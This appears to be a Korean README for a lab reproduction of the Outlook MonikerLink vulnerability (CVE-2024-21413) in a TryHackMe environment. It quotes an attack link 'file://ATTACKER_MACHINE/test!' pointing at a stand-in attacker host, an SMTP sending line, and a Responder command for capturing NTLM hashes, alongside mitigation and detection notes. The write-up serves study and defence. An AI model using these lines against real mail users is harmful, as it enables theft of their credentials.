
이 저장소에는 특정 메일 클라이언트가 메시지에 포함된 SMB/moniker 스타일 링크를 처리할 때 발생하는 취약점인 CVE-2024-21413에 대한 연구 노트와 고수준 개념 증명(PoC)이 포함되어 있습니다. 여기에 문서화된 PoC 및 실험은 통제된 실험실 환경의 시스템에서 수행되었습니다.
이 프로젝트는 완전히 격리된 TryHackMe 환경에서 MonikerLink 동작(CVE-2024-21413)을 재현하여 특정 하이퍼링크 형식이 Outlook이 인증 시도를 유출하거나 추가 악용으로 이어지는 방식으로 링크를 처리하도록 할 수 있는 방법을 보여줍니다. 결과물은 PoC와 보안 팀이 적용할 수 있는 우선순위가 지정된 완화 및 탐지 제안 세트입니다. 라이브/무단 시스템은 대상으로 삼지 않았습니다.
| 도구/기술 | 목적 |
|---|---|
| Python | 스크립트 개발 |
| Linux (Kali) | 대상 시스템 |
| Metasploit | 악용 및 액세스 |
| TryHackMe Lab | 통제된 환경 |
이 코드는 CMNatic이 작성했으며 여기에서 찾을 수 있습니다.
예를 들어, 다음 줄 “<a href=“file://ATTACKER_MACHINE/test!”에서 “ATTACKER_MACHINE”을 공격 머신의 IP 주소로 바꾸었고, “server = smtplib.SMTP('MAILSERVER', 25)” 줄에서는 “MAILSERVER”를 피해 머신의 IP 주소로 변경했습니다.
responder -I ens5
systemctl start systemd-resolved

이 개념 증명은 Microsoft Outlook의 링크 처리에서 미묘한 차이를 드러냅니다. SMB 리소스를 참조하는 특정 file:// 스타일의 모니커 링크는 Outlook의 표준 필터링을 우회하고 아웃바운드 인증 시도를 유발할 수 있습니다. 여기에 설명된 동작은 완전히 통제된 TryHackMe 랩에서 재현되었으며, 겉보기에 무해한 링크 형식이 네트워크 상호 작용을 숨길 수 있음을 강조합니다. 공급업체 패치와 탐지 지침이 발표되었지만, 모니커/파일 체계의 합법적인 사용으로 인해 기본 메커니즘은 여전히 복잡합니다. 중요한 점은 이 PoC에 의해 생성된 활동이 네트워크 수준에서 관찰 가능하다는 것입니다(예: NTLM 인증 시도를 보여주는 패킷 캡처). 따라서 포렌식 분석 및 사고 조사에 활용할 수 있습니다.
Florian Roth가 :file:\: 요소를 포함하는 이메일을 탐지하기 위한 Yara 규칙을 만들었습니다.
